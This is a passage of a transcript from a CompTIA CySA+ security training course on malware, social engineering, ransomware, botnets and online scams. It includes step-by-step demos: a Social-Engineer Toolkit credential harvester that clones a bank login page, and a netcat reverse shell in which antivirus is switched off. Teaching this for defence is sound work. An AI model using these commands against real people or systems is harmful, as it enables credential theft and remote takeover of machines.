across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+
certification exam, is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats and risks to an organization, to configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore asset protection from malware, and the protection of sensitive
information from users through social engineering scams. I'll start by examining different malware types, the
various forms of social engineering, and their related security risks. I'll then examine authentic email phishing
messages and show how to execute social engineering attacks using the Social Engineering Toolkit, otherwise
called SET. Next, I'll explore the danger of ransomware and how to mitigate this threat, how malware and
botnets have become black market commodities, and the proliferation of botnets under malicious user control.
I'll then demonstrate how to configure a reverse shell and use the Malzilla tool to explore malicious web pages.
Lastly, I'll explore a GUI malware dashboard and show how to configure malware settings on an endpoint
device.
[Video description begins] Topic title: Malware Types. The presenter is Dan Lachance. [Video description
ends]
Malware is malicious software. The scary thing about malware is that creating it doesn't require as much technical expertise on the malicious user's part these days as it did in the past. In other words, there are plenty of malware authoring tutorials and toolkits available on the Internet for anybody who's so inclined. Malware infections begin with reconnaissance.
This is information gathering by attackers to seek out what might be a vulnerable system, or doing a bit of homework to see which users might be gullible and easily fooled into clicking something in a phishing email message, that type of thing. So it's about tricking people; that still remains the most serious IT security threat. It's the people factor: people clicking on things that they shouldn't be clicking on, or plugging in USB thumb drives that might contain an infection, things of that nature. Now after a user is tricked in one way or another into unleashing the malware on a host or on a network, the malware will infect the device and could even propagate itself over the network if it's a worm. After which, data might be stolen or, in the case of ransomware, data might be encrypted, and a decryption key would not be made available unless the user pays a ransom. And even if they do pay the ransom, there's never a guarantee that the key will be supplied anyway. It could also result in deleted data or systems that are attacked and brought down. It could be anything.
A Trojan is a type of malware. You could think of it as a wolf in sheep's clothing. What does that mean? It means it's something that looks useful and benign, such as, perhaps, a pop-up on your computer when you're in your web browser surfing the Internet that states there is a free tool that will scan your machine for viruses, when it could itself be the virus, it could be the malware. So Trojans are often used to deliver some other type of malware to a host or to a network. A virus needs to attach itself to specific files. And those files could be of any type, whether it's an Office productivity file, like a spreadsheet, or a PowerPoint template, or anything like that. It could also attach itself to an app installation file, so that when a user downloads what appears to be useful software, in the form of a Trojan, the virus also gets installed. So the Trojan serves as a delivery vehicle in that case.
A virus might also be part of, for example, a USB thumb drive, so removable media that gets triggered when it's plugged into the machine, depending on how the machine is configured. Now, often, if you have people downloading illegal copies of music or movies or TV shows, that type of media, actual playable entertainment media, could also unleash a virus in the background. A worm doesn't need to be attached to a file like a traditional virus does, and it can self-propagate over the network. And what it might do when it's self-propagating is also have a component that scans the network for vulnerable hosts, such as vulnerable file sharing hosts that it could detect and then place itself into to further infect other devices. Ransomware, of course, can either prevent system startup or encrypt user data files, and demands a payment to receive a decryption key. We've mentioned that there's never a guarantee that one will receive the key even if the ransom is paid. And payment is usually demanded in some anonymous cryptocurrency format like Bitcoin. So bear in mind there's never a guarantee the keys will be provided. So you might pay a ransom and get nothing in return.
So what do we do to mitigate malware? Well, number one is user training and awareness. This goes very, very far in helping prevent infection, and the spread of infection, from malware-infected devices. Having up-to-date antivirus signatures is always important. But much modern malware doesn't have a specific signature, as was the case years and years ago. Instead, it morphs itself into some other form to evade detection through traditional signature-based comparisons. And so it's important to have an antivirus tool, then, that has the ability to analyze behavior to determine if there's something fishy going on. An example of this would be a piece of malware that might attach itself to the keyboard buffer in memory, essentially a keylogger, to read what people are typing in. Well, that's not normal outside of some applications that might need to do that at the operating system level. And so that could trigger a warning or an alert to a user, or to a central configuration tool, that there was suspicious activity and potentially malware has been detected.
In this video, you will learn how to identify the various forms of social engineering and the related security
risks.
Objectives
identify the various forms of social engineering and the related security risks
[Video description begins] Topic title: Social Engineering. The presenter is Dan Lachance. [Video description
ends]
There are a number of different types of attackers, including white hat hackers, grey hat hackers, and black hat hackers. A white hat hacker's purpose is to improve security, but not to exploit any weaknesses that get discovered. So it's about the detection of vulnerabilities and then the reporting of those vulnerabilities to system owners. Now with white hat hackers, the system owners aren't going to be surprised by this because they will have had a sense that this activity was taking place. So for example, it could have been system owners that hired a penetration testing team to do this. Although in this case, it's really more of a vulnerability assessment because weaknesses are not being exploited as they would be with a true pen test.
Grey hat hackers don't have malicious intent. They still discover weaknesses and report them to system owners, but without even having permission to scan the systems owned by these entities. And so you could say that this is a violation of ethics and in some cases could be a violation of laws, which could result in fines or imprisonment.
Black hat hackers are the bad guys or bad girls that have hacking skills. Their purpose is to exploit discovered weaknesses. Now why would this happen? Personal profit is a big motivation, as is ideological or political motivation, or simply exerting the power they have with their hacking skills and for bragging rights. System owners aren't notified of this type of attack. And of course, this type of activity can result in fines or imprisonment.
Now, this leads us into social engineering, which is often a way that attackers can get into a network. Social
engineering is trickery or deception. Essentially, the goal is to get sensitive information disclosed from
unsuspecting victims in some way by somehow fooling them. Now there are many forms of this, many forms
of extortion, sextortion, and blackmail.
An example would be impersonating government departments. There are a lot of income tax scams where the IRS in the United States, or the Canada Revenue Agency, CRA, in Canada, is supposedly calling an individual, stating that they owe income taxes that they need to pay right now because a warrant has been issued for their arrest. It's a way to scare people into jumping into action without thinking clearly, and scammers take advantage of this. Or it could be a phone call or an email message from somebody impersonating law enforcement, maybe trying to trick someone into paying a fine immediately through a wire transfer. And of course, there's phishing with a ph, not an f. Phishing email messages are messages designed to try to trick people into somehow disclosing something sensitive, like credentials for a banking web site and so on.
[Video description begins] Social Engineering without Malware [Video description ends]
Now, social engineering is also possible without technology, without malware. Let's say that we've got a
malicious user that is impersonating a communications provider technician over the phone. So it's a phone call.
Maybe it's a phone call to the receptionist in the lobby of an organization saying that we've detected that you
have some problems with your phone system or Internet connectivity. We need to come in and take a look.
Now of course, again, the attacker ideally would have done some due diligence and some reconnaissance to
discover which communications provider company the victim organization is using. So then the attacker would
show up dressed appropriately in the right outfit. The victim, such as a front desk receptionist, might then
allow the attacker into a server room or a wiring closet because they are the communications tech. The attacker would then have physical access to equipment. So if things like storage arrays aren't locked up in a rack in the server room, the attacker could potentially physically steal drives and, if those drives aren't encrypted, have access to the data on them.
[Video description begins] Phishing E-mail Message. A screenshot of a phishing e-mail is displayed. [Video
description ends]
An example of a phishing email message would be something that looks legitimate. It looks like a real email from a supplier or a business partner or even another colleague. So maybe it's an email that looks like a legitimate message from my bank saying I need to reset my password due to a recent outbreak of malicious activity. The irony is not lost. So the victim clicks the link, and the link downloads and installs malware. Or, simply, when the user clicks the link, they specify their username and password, or their bank account number and their password, and that gets sent out to the malicious user.
[Video description begins] Social Engineering Mitigation Controls [Video description ends]
The other thing to bear in mind is that there are some mitigation controls, some countermeasures we can put in place to reduce the impact or the probability of social engineering succeeding. There are administrative controls such as user training and awareness. Take advantage of any time you might have with standard user populations in the company, such as when onboarding new hires. Don't spend that time talking about things like having to use strong passwords and so on, because they're going to find that out on their own when they go to reset a password. Instead, spend the time making people actively aware of how often these types of deceptive email messages come into mailboxes. So people need to be trained. They need to understand to be very judicious about anything they're going to click on. Basically, they need to be taught to be cynical and suspicious all the time, unfortunately. Security documentation needs to be accessible to users. It needs to be convenient and easy to find, because as cybersecurity analysts we will be updating security documentation when incidents occur and new countermeasures are put in place.
Periodic email reminders about security are not a bad idea. Security posters in the workplace: get creative, make it fun, make it interesting, not boring. There needs to be a way to make people feel like they have ownership in it. In other words, maybe convey to users that they need to treat every single email message and all the IT systems in the organization as if they controlled their own bank account and credit cards. Make them feel ownership of it. Now there are technical controls that can mitigate social engineering, such as email spam filtering and having up-to-date anti-malware solutions on every device, including mobile devices like smartphones. Having network firewall rules in place correctly, so they restrict everything other than explicitly allowed items on an as-needed basis, for traffic both in and out. Host firewall rules, because every device should have a personal firewall, even mobile devices. And also the proper configuration of intrusion detection and prevention systems, which might be able to detect suspicious activity.
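To make that default-deny idea concrete, here is a minimal host firewall sketch using iptables on a Linux host; the specific allowed port is purely an illustrative assumption, not something taken from this course.

# set a default-deny posture on every chain
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
# allow replies to connections this host initiated
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# explicitly allow only what's needed, for example outbound HTTPS
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT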
[Video description begins] Social Engineering Example [Video description ends]
So let's take a look at an example of social engineering. Let's say a user reads a malicious email message. Now, of course, the user doesn't know it's malicious; it looks benign. And because the message is believable, the user opens up a file attachment. An attacker might do some reconnaissance, a bit of homework, and see that a company uses, let's say, company X as a supplier of office equipment. And so with that knowledge, the attacker could put together an email message that looks convincing, apparently from the supplier, saying "hey, here's your latest invoice that wasn't paid for the equipment you ordered". That would be a way that a user might actually be fooled into opening a file attachment, except in this case it's malicious. So let's say it's ransomware that executes on the user's device, and the user's data files are then encrypted. The user can't get to them unless they pay a ransom and, hopefully, receive a decryption key.
[Video description begins] Topic title: Social Engineering Examples. The presenter is Dan Lachance. [Video
description ends]
If you use email, and many people do, you've probably seen messages that look similar to what I've got on the screen here.
[Video description begins] An Outlook mailbox is open. An email is open. [Video description ends]
Apparently, this is an Amazon.com order confirmation, and it talks about how my account was used to buy a $250 gift card. Okay, well, I've got a link here to Cancel The Order. However, when I hover over it, I can see in the bottom left that it's referencing something that says korder.pw.
[Video description begins] In the email, he points to a button labeled "Cancel The Order". [Video description
ends]
That looks like a URL. That looks like it could be fishy. And as I go down through the message, I can see that
a $250 gift card for Amazon was sent to a specific Hotmail address. I have no idea who that is.
Although, when I look at that email address, I know something is definitely up. But I can also see here it says,
Please update your payment, we're having trouble with your billing.
[Video description begins] He highlights the email address of Netflix Support. [Video description ends]
Verify your account now. Now, when I hover over that link, in the bottom left, I can see it's referring to
something, and I just don't really know what that is.
[Video description begins] He points to a link labeled "Verify Account Now". [Video description ends]
[Video description begins] He clicks the Verify Account Now link. A web page labeled "Security error" opens.
It includes the text "Deceptive site ahead". [Video description ends]
Now, when I click it, this is what you get, Deceptive site ahead. Now this is an indication that your web
browser or your antivirus solution is actively checking that stuff out.
[Video description begins] He closes the Security error web page and switches to the email. [Video description
ends]
However, you don't want to click on things and just hope they get caught; that is the last thing anybody should do.
[Video description begins] He right-clicks the Verify Account Now link and a shortcut menu opens. It includes
options labeled "Open link in new tab", "Copy link address", and "Open link in new window". [Video
description ends]
Instead, you can carefully right-click, copy the link address, and check it out.
[Video description begins] A web site labeled "kaspersky" opens. It includes tabs labeled "VirusDesk" and
"Application Advisor". The VirusDesk tab is selected. [Video description ends]
Now, when I say check it out, I mean go to some of the standard free tools that will scan a URL to see if it's
malicious. Here I've gone to virusdesk.kaspersky.com.
[Video description begins] He points to the URL in the address bar. [Video description ends]
And so I'm going to go ahead and put that URL link that I copied from that email, I'm going to click SCAN.
[Video description begins] In a text box, he pastes the URL "http://divindus-dmc.com/re". [Video description
ends]
Now we already know it's not a good site to go to, because when I clicked on it, my web browser caught it. It says you risk losing your data by following this link. So we want to make sure that this is the type of thing that users are aware of. What better way to communicate this than to have a paid lunch and learn for users, and demonstrate during it how easy it is for this to happen? Now, it's very hard to regain a reputation if a company loses sensitive information or is hacked. It's hard to win those customers back and regain their trust and their loyalty. So it's very important that everyone in the organization take ownership of the seriousness of these types of threats.
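Besides pasting the link into an online scanner as shown here, an analyst could also look the domain up from a terminal before anyone clicks it. This is a small optional sketch, assuming the standard whois and dig utilities are installed; the domain is the one captured from the phishing message above.

# who registered the domain, and when
whois divindus-dmc.com
# what the domain actually resolves to
dig +short divindus-dmc.com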
Find out how to use the Social Engineering Toolkit to carry out social engineering attacks.
Objectives
[Video description begins] Topic title: Social Engineering in Action. The presenter is Dan Lachance. [Video
description ends]
Social engineering is all about deception, tricking somebody into doing something they otherwise wouldn't do
or tricking them into divulging sensitive information, including banking information.
[Video description begins] A web site labeled "Scotiabank." opens. A sign in page is open. [Video description
ends]
That's our focus in this example. We're going to demonstrate how easy it can be to try to fool people into
providing sensitive banking information. So here in my web browser, I've navigated to the sign-on page for the Scotiabank web site. But it could be any bank; it doesn't make a difference. What I'm going to do is copy that URL, because we're going to need it shortly.
Now that I've copied the URL, we're going to switch over to Kali Linux. Now the reason I copied that URL is
because we're going to tell Kali that we want to clone or copy that web site.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
Even though it's going to be under our control, it's going to look legitimate. That's where things start to get
really scary. So here in Kali Linux, I'm going to run the setoolkit. As you might guess, se in this case stands for
social engineering.
[Video description begins] He executes the following command: setoolkit. A menu page opens and the
following prompt is displayed: set>. The menu page includes some menus such as 1) Social-Engineering
Attacks and 2) Penetration Testing (Fast-Track). [Video description ends]
It's hard to believe that we have a menu system with a bunch of social engineering hacks, but it is what it is. So
I'm going to start with number 1, so Social-Engineering Attacks.
[Video description begins] He enters 1. Some menus are displayed such as 1) Spear-Phishing Attack Vectors
and 2) Website Attack Vectors. [Video description ends]
I'm looking at Website Attack Vectors in this case, so number 2. And I want to try to get people's banking
credentials.
[Video description begins] He enters 2. Some information and menus such as 1) Java Applet Attack Method, 2)
Metasploit Browser Exploit Method, and 3) Credential Harvester Attack Method are displayed. The following
prompt is displayed: set:webattack>. [Video description ends]
So I'm going to press 3, which takes me into Credential Harvester Attack Method. I want to harvest their
banking credentials.
[Video description begins] Some information and menus such as 1) Web Templates and 2) Site Cloner are
displayed. The following prompt is displayed: set:webattack>. [Video description ends]
Number 2, Site Cloner. Well, that's why I copied that Scotiabank URL initially.
[Video description begins] He enters 2. The Terminal window prompts: IP address for the POST back in
Harvester/Tabnabbing [192.168.4.52]:. [Video description ends]
First of all, we have to give it the IP address where we want results spit back to. And that, in this case, is going
to be the Kali Linux host that I am sitting at. And it already has the IP address for that in square brackets, I'm
just going to press Enter to accept it. Then I have to enter the URL to clone.
[Video description begins] The Terminal window prompts: Enter the url to clone:. [Video description ends]
So I've gone ahead and pasted in my Scotiabank authentication page, I'm just going to press Enter.
And essentially, it now tells me that the Credential Harvester is running on port 80 on this IP address, so the one listed up here for Kali Linux.
[Video description begins] In the previous prompt, he highlights the IP address: 192.168.4.52. [Video
description ends]
And any information that is of any use is going to be displayed here on this screen. It'll also generate a report after we exit out of the Social-Engineering Toolkit, if we want to. So this is interesting; what we need to do then is somehow trick people into visiting this IP address. Of course, we could use a DNS name that resolves to it. Okay, well that was easy.
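To recap the menu path just followed, here is a sketch of this particular run; the prompts and menu numbers are the ones shown on screen, and the POST-back address and clone URL would of course differ in your own lab.

setoolkit
set> 1                    # Social-Engineering Attacks
set> 2                    # Website Attack Vectors
set:webattack> 3          # Credential Harvester Attack Method
set:webattack> 2          # Site Cloner
IP address for the POST back in Harvester/Tabnabbing [192.168.4.52]:   (press Enter to accept)
Enter the url to clone:   (paste the copied sign-in page URL)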
[Video description begins] He switches to the Scotiabank web site. The sign in page is open. It includes text
boxes labeled "Username or Card number" and "Password" and a button labeled "Sign In". [Video
description ends]
I'm now in my browser connected to the IP address of Kali Linux where we've cloned the Scotiabank sign in
page.
[Video description begins] The address bar contains 192.168.4.52. He points to it. [Video description ends]
[Video description begins] In the Username and Card number text box, he enters a numeric value. [Video
description ends]
So I'll start entering in a username or a card number and a password; I'm going to put a password in here.
[Video description begins] In the Password text box, he enters the password. [Video description ends]
When I click Sign In, the user isn't informed that anything is wrong.
[Video description begins] He switches to the sign in page with the URL:
scotiaonline.scotiabank.com/online/authentication/authentication.bns. [Video description ends]
And as a matter of fact, it looks like they're redirected to the real thing. Looks like we've got a secured
connection, so the user won't even know anything happened.
[Video description begins] He clicks a lock icon adjacent to the address bar. A message box labeled
"Connection is secure" opens. [Video description ends]
But, what if we go back to Kali Linux and see what it's telling us?
[Video description begins] He switches to the Terminal window. [Video description ends]
Wow, I can see the userName and password are both specified here based on what the user entered into that
cloned fake Scotiabank web app.
[Video description begins] He highlights the username and password. [Video description ends]
Naturally, you don't want to do this for real against people without their explicit permission, in other words,
their knowledge of what you're doing. This is not something that is probably going to be looked upon
favorably, if you get caught doing it. So standard disclaimer, only use this in an environment where you
control everything or you have express written permission to do this type of thing. Now this is one of those
kinds of things that's very easy to do, it doesn't take a genius to make this happen.
And the other interesting thing about this is that it's a great way to really bring the point home to end users with training or training videos. So instead of spending time telling them about using complex passwords (they're going to have to do that anyway when they reset passwords based on your password policies), spend it on this type of thing, which is not so readily apparent. People need to be aware of how easy it is for the bad guys to do this through social engineering.
After completing this video, you will be able to recognize the danger of ransomware and how to reduce this
threat.
Objectives
[Video description begins] Topic title: Ransomware. The presenter is Dan Lachance. [Video description ends]
Ransomware is a form of malware. And we've been hearing more and more about this in media reports over
the last few years, so it's quite prevalent. So this is often delivered through deception by tricking people, for
example, to click on a link in an email message or to open a file attachment. So one of the things that
ransomware can do is lock system startup. It can prevent a system from actually booting up. And instead, it
might display a message asking for the payment of ransom. Or it could encrypt data files, or could do both.
And in the same way, ask for a payment, usually through some anonymous mechanism like Bitcoin
cryptocurrency.
Now ransomware would begin with the user clicking a link or opening a file attachment in a malicious email message. After which, the ransomware gets installed and executes on the device, and local files get encrypted. The other thing is that remote files might also get encrypted: if the user is connected to a cloud account and has write access to it, then depending on the ransomware variant, it very well could continue to write out to those locations as well. So it's a serious issue. Next, the user gets a message that a ransom is being demanded in order to receive a decryption key, although there is never a guarantee that the decryption key will be provided.
So, what can be done as a cybersecurity analyst to mitigate the impact of ransomware? Number one, as always, is user awareness of how easy it is for ransomware to infect a device. People need to be cynical and suspicious
about everything. On the technical side, we should have offline data backups. If we take periodic data backups,
that's a good thing. But if they're left online and a machine is infected, and that machine has write access to
that online backup, it can also encrypt the backup. We need to have up-to-date machine operating system
images. So in the event that we must respond to a ransomware incident, we have a quick way to get the
operating system back up and running. In other words, to adhere to the RTO, the Recovery Time Objective. So
the incident response plan is absolutely crucial when it comes to containing and dealing with ransomware
outbreaks.
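As a concrete illustration of what an offline backup can mean in practice, here is a minimal sketch of a backup that is detached once it completes; the source path and mount point are assumptions for the example, not something from this course.

# copy user data to removable or otherwise detachable media
rsync -a /home/ /mnt/offline_backup/
# detach the media so ransomware on this host can no longer reach it
umount /mnt/offline_backup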
[Video description begins] Commodity Malware [Video description ends]
Now, there's also commodity malware. What does that mean? It means that malware is sold as a commodity on
the dark web or the dark net. They're both the same thing, just depends what you want to refer to it as. There
are malware authoring kits for sale. There are botnets for rent. A botnet is a collection of infected devices
under singular malicious user control. And then there are also malware tutorials on how to create malware,
how to deliver malware, how to use the malware for personal gain, for example.
After completing this video, you will be able to recognize how malware and resultant botnets have become a
commodity for black markets.
Objectives
recognize how malware and resultant botnets have become a commodity for black markets
[Video description begins] Topic title: Commodity Malware. The presenter is Dan Lachance. [Video
description ends]
Commodity malware comes in many different forms, such as ransomware, which, when infecting a machine, can encrypt user data files and require a ransom to be paid before producing a decryption key for the user, if the key is provided at all. There's distributed denial-of-service or DDoS malware. Now a DDoS attack essentially means that we have a collection of computers that are instructed, for example, to flood a victim network with useless traffic. Hence, denial-of-service. Distributed, because it's multiple machines, essentially machines in a botnet. A botnet is a collection of infected machines under singular hacker control. Those can be rented for any purpose. There's also ATM malware, where we're talking about bank machines: the ability for malware to dispense cash from a bank machine that otherwise should not be dispensed.
[Video description begins] Security techs should invest time in tracking the dark web in case their
agency/company is being discussed/targeted. [Video description ends]
Now in this case, we're going to talk about a specific ATM piece of malware.
Now the Backdoor.MSIL.Tyupkin malware was one that was widely used in a lot of Eastern Europe years ago. What would happen is that the malware would enable communication with the ATM's PIN pad, so that mules, which are essentially people sent to the ATM to steal the cash from it, so to speak, would enter a specific code that is synchronized with the malware. Now this particular variant of ATM malware is designed to take advantage of a problem with a specific DLL used on 32-bit Windows variants found in some bank machines. So at any rate, it makes some registry changes and then allows the mule to physically interact with the ATM and request money to be dispensed from specific cartridges within the ATM that contain cash. So they would have to enter a cassette number and then it would dispense money. And this particular variant of ATM malware was able to dispense 40 banknotes from a specific cartridge or cassette within the ATM. So even ATM malware is available. And again, a lot of these are available as commodities to be purchased or rented on the dark net or the dark web.
After completing this video, you will be able to describe the proliferation of botnets under the control of
malicious users.
Objectives
[Video description begins] Topic title: Botnets. The presenter is Dan Lachance . [Video description ends]
In cybersecurity parlance, a botnet is a collection of infected systems under singular malicious user control. What happens is the malicious user has a command and control, or C&C, server that is used to pass instructions to the botnet machines. Now the infected machines in the botnet are referred to as zombies. So, as seen in our diagram on the left, we've got a hacker that issues a botnet command. That happens through command and control, or C&C, servers, which in turn send those instructions to infected bots, which we know are called zombies. And those zombies execute the hacker's commands.
Now this is the type of thing that might be a commodity on the Dark Net, otherwise called the Dark Web, where you might rent the services of a botnet to flood, say, a competitor's site with useless traffic to bring it down during a crucial time. Such as a betting web site that might be flooded with useless traffic during an important sports event, or a retail web site during an important part of the season, like the holiday season. Now a lot of this type of activity occurs on the dark net through anonymous types of connections, so using, for example, a Tor tool like the Tor web browser, or making a connection to the Invisible Internet Project, otherwise called I2P. This is a higher-level type of anonymous network layer. I say higher level in reference to the OSI model, whereby it has its own unique identifiers beyond IP addresses and standard things like that. So it's very difficult to track and trace.
[Video description begins] Topic title: Reverse Shell. The presenter is Dan Lachance. [Video description
ends]
You know, if you can trick somebody into doing something or installing software or clicking a link, you can
take over pretty much anything.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
User training and awareness of this is absolutely paramount in mitigating social engineering attacks, which lead to, well, pretty much everything else. Let's talk about how easy it is to set up a reverse shell. A reverse shell allows a victim machine, perhaps one that's been infected with malware, to make an outbound connection to the attacker's station. So it defeats most firewalls in that sense, because often a firewall won't allow connections initiated from the outside. That's why reverse shells are popular in the malicious user world. So to get started here in Kali Linux, I'm going to run the netcat command line tool, that's nc. And I'm going to use the -lvp parameter set. Now l means listen, v is verbose, and p of course is the port, which I'll specify in a moment. So I'm going to go ahead and specify a port number, let's say of 81.
[Video description begins] He executes the following command: nc -lvp 81. [Video description ends]
What this means is that I am listening on my attacker station, on any IP address since I didn't specify an interface, on port 81. What am I listening for? I am waiting for infected machines to come back and talk to me. So how would a machine be infected? Well, there are innumerable ways that can happen. What we're going to do is switch over to a Windows 10 station. Here in Windows 10, I have gone to a web site where I can download netcat for Windows.
[Video description begins] A web page labeled "netcat 1.11 for Win32/Win64" opens. [Video description ends]
Now realistically, an attacker would find a way to trick a user into clicking on something that would install this
on their machine. But here we're going to willingly download and install netcat on Windows 10.
[Video description begins] The Command Prompt window opens. The following prompt is displayed: D:\
netcat-1.11>. [Video description ends]
So I'm going through the steps manually; an attacker would automate this and have it run in the background, unknown to the victim. So here I'm going to type dir; I'm in the directory where I've installed netcat.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. The following prompt is displayed: D:\netcat-1.11>. [Video
description ends]
And I can see, for example, nc.exe, the Windows netcat executable. So I'm going to clear the screen with cls, and I'm going to type nc and then the IP address of the Kali Linux station that is currently waiting for connections on port 81. Then I'm going to put in a space and port 81, and with -e I'll specify what I want to execute, which is cmd.exe. Now of course, I'm typing this in willingly and manually; again, an attacker would normally do this in stealth mode. This would be automated in a script or embedded within an executable that the user's tricked into running. All right, I'm going to press Enter and now we're going to flip back to Kali Linux.
[Video description begins] He executes the following command: nc 192.168.4.52 81 -e cmd.exe. [Video
description ends]
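Pulling the two halves together, this is the entire reverse shell as demonstrated; the IP address and port number are the ones used in this particular demo and would differ in your own lab.

# on the attacker (Kali) host: listen for the call-back on TCP port 81
nc -lvp 81
# on the victim (Windows) host: connect back to the attacker and hand it cmd.exe
nc 192.168.4.52 81 -e cmd.exe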
Now in this case, I have a message in Windows 10 that says the system can't execute the specified program.
Well, that's probably because I have anti-malware real time protection enabled.
[Video description begins] A window labeled "Windows Security" opens. It is divided in two parts. The first
part is a navigation pane. The second part is a content pane. The navigation pane includes options labeled
"Home", "Virus & threat protection", and "Device security". The Virus & threat protection option is selected.
The corresponding page is open in the content pane. It includes sections labeled "Last scan", "Quarantined
threats", and "Virus & threat protection settings". [Video description ends]
So here in my Virus & threat protection in Windows 10. I'm just going to go down and click Manage settings
under Virus & threat protection settings and I'm going to turn off Real-time protection.
[Video description begins] In a section labeled "Real-time protection", he turns off the toggle button. A dialog
box labeled "User Account Control" dialog box opens. It includes a button labeled "Yes". [Video description
ends]
And I'll choose Yes. Now, of course, you would normally never do this.
[Video description begins] The User Account Control dialog box closes. [Video description ends]
But for this demonstration, I am going to do that. Again, a malicious user could trick a user into doing something similar. But of course, netcat is an old tool; often malicious developers will build newer tools, newer exploits, that aren't so easily detected.
[Video description begins] He points to a section labeled "Threat history". [Video description ends]
Now, if I take a look at the Threat history on this host, notice that we've got a quarantined threat. It's the netcat
hack tool.
[Video description begins] In the Quarantined threats section, he points to a threat labeled
"HackTool:Win32/NetCat". He expands an arrow icon adjacent to it and buttons labeled "Restore" and
"Remove" are displayed. [Video description ends]
Okay, well, I'm going to choose Restore because we are in testing mode; we know it's a tool that, at least normally, is used for malicious purposes.
[Video description begins] The User Account Control dialog box opens. He clicks the Yes button. The User
Account Control dialog box closes. [Video description ends]
But we're going to restore it back so we can run the command again. Back here in the command prompt, if I
run DIR, I can see that nc.exe is back.
[Video description begins] He switches to the Command Prompt window. The dir command and its output is
displayed. The output lists all files and subdirectories contained in a specific directory. [Video description
ends]
So we're going to use the up arrow key so that we can run our command once again. This time it runs.
[Video description begins] He executes the following command: nc 192.168.4.52 81 -e cmd.exe. No output
displays. [Video description ends]
Let's go back and check Linux now that we've gotten around the anti-malware real time protection.
[Video description begins] He switches to the Terminal window. The following prompt is displayed: D:\netcat-
1.11>. [Video description ends]
This is what I see in Kali Linux. I've got a command prompt session with the remote host.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. [Video description ends]
So I can do anything I want here. It looks like I'm in Windows, but I'm not; I'm in Kali Linux. So I can start to take a look at the file system on that machine.
[Video description begins] He executes the following command: c:. The following prompt is displayed: C:\
Users\danla>. [Video description ends]
[Video description begins] He executes the following command cd /. The following prompt is displayed: C:\>.
He executes the following command: cls. [Video description ends]
If I go into a specific folder to get something or to look around, I can also see what's there.
[Video description begins] He executes the following command: cd media. The following prompt is displayed:
C:\Media>. He executes the following command: dir. The output lists all files and subdirectories contained in
a specific directory. [Video description ends]
I have full command line access based on whoever's logged in on that Windows host; that is, of course, I have their level of privilege. But the point is, this is pretty darned easy to do. So it really does highlight the importance of having up-to-date anti-malware tools. Some people are of the opinion that you don't really need anti-malware solutions, since a lot of the newer exploits won't even get detected anyway; nothing could be further from the truth, as evidenced in this example.
In this video, find out how to view an analysis of various scam websites.
Objectives
[Video description begins] Topic title: Internet Scams. The presenter is Dan Lachance. [Video description
ends]
There are so many scams out there on the Internet, it's enough to make a cybersecurity analyst's head spin.
[Video description begins] The Outlook mailbox opens. An email is open. [Video description ends]
Here's an example of an email message sent to someone where it says, hey, I know your password. And I've
infected your computer, and I've recorded you through your webcam. And after that, I've removed my
malware, not leaving any traces. As we scroll down, essentially, this is blackmail. It says transfer exactly $900
through bitcoin. Here's the bitcoin address, and you have two days to do it.
[Video description begins] He highlights an alphanumeric bitcoin address. [Video description ends]
Otherwise, any video that I've taken through your infected computer will be made known to the world. Now,
nine times out of ten, this is not true anyways. And even if it were true and you paid this amount of money,
what's to say they won't extort you for more? It's something to stay away from. This is playing upon people's
fears, to pay up. And here's another wonderful example about a doctor that has left, apparently, $9.3 million.
And the bank has asked some kind of a lawyer or an attorney to find next of kin to get the money, and please
reply. And there's a Gmail address that's being supplied. Well, this isn't necessarily playing on people's fear, is
it? This is playing on people's greed. There is no such thing as easy money. What are the chances that you've
got a distant relative in another country that left a large sum of money, and that you're the next of kin? People
need to think carefully about these types of scams. And there are just so many out there. And that's why sites
such as the ARTISTS AGAINST 419 are in existence.
[Video description begins] A web site labeled "ARTISTS AGAINST 419" opens. An index page is open. It
includes a table with four columns and six rows. The column headers are GENERAL FORUMS, TOPICS,
POSTS, and LAST POST. The GENERAL FORUMS column includes entries such as General Issues, Thread
of Shame, Report a Scam, and Chat. [Video description ends]
There are plenty of sites out here that are focused on fraud and scams, and what to do about it, what to look out
for. So for example, if I click on the Thread of Shame, here I'll see a lot of topics about problems.
[Video description begins] A table with four columns and several rows is displayed. The column headers are
TOPICS, REPLIES, VIEWS, and LAST POST. The TOPICS column includes entries such as handelfarms.com
and If attend school just for getting a degree, why not buy it? [Video description ends]
For example, what do we see here? If attending school for getting a degree, why not just buy it? Okay, so this
must be one of those scams where someone could just go online and pay for some kind of a university diploma
or degree.
[Video description begins] He clicks the If attend school just for getting a degree, why not buy it? entry. The
corresponding topic opens. [Video description ends]
And we can see here that the Link is a SCAM. Well, we're going to go take a look at it right now.
Now, you should not just follow links that lead to scams, because you might also infect your computer. You can infect your computer just by looking at a web site, without even clicking on anything. It's possible, so be very careful in doing this. I'm going to do this in a sandboxed, controlled environment. Now, the thing about a lot of these scams is that the sites look legitimate. They look professional.
[Video description begins] A web site labeled "DIPLOMA123" opens. He scrolls through this web site. [Video
description ends]
However, really, what are they offering? Fake certificates, fake degrees. The thing is, a lot of these scams could take the form of gathering your information and then trying to blackmail you because you tried to partake in this illegal activity. So we see a lot of this stuff out there on the Internet. But buying a driver's license or some kind of a transcript is obviously not above board. Stay away from this, naturally.
[Video description begins] He closes the DIPLOMA123 web site and switches to the ARTISTS AGAINST 419
web site. [Video description ends]
And of course, watch out for things like blackmail, if you do decide to partake in this type of illegal activity.
Now, going back to the aa419, ARTISTS AGAINST 419 site, there are also other things we can look up
besides the Thread of Shame, things to watch out for. You also have the option of reporting scams. If I click
Report a Scam, then we can see there are lots of forum listings here for this type of thing as well, such as fake
banks.
[Video description begins] He clicks the Report a Scam entry. [Video description ends]
If I click, I can read the details about that type of scam. So if this is really feeding your cynicism, that's
probably a good thing. We need to translate that to our end user base, to be cynical, suspicious, untrusting of
essentially anything that they're dealing with in the digital world. Whether it's a message they're receiving
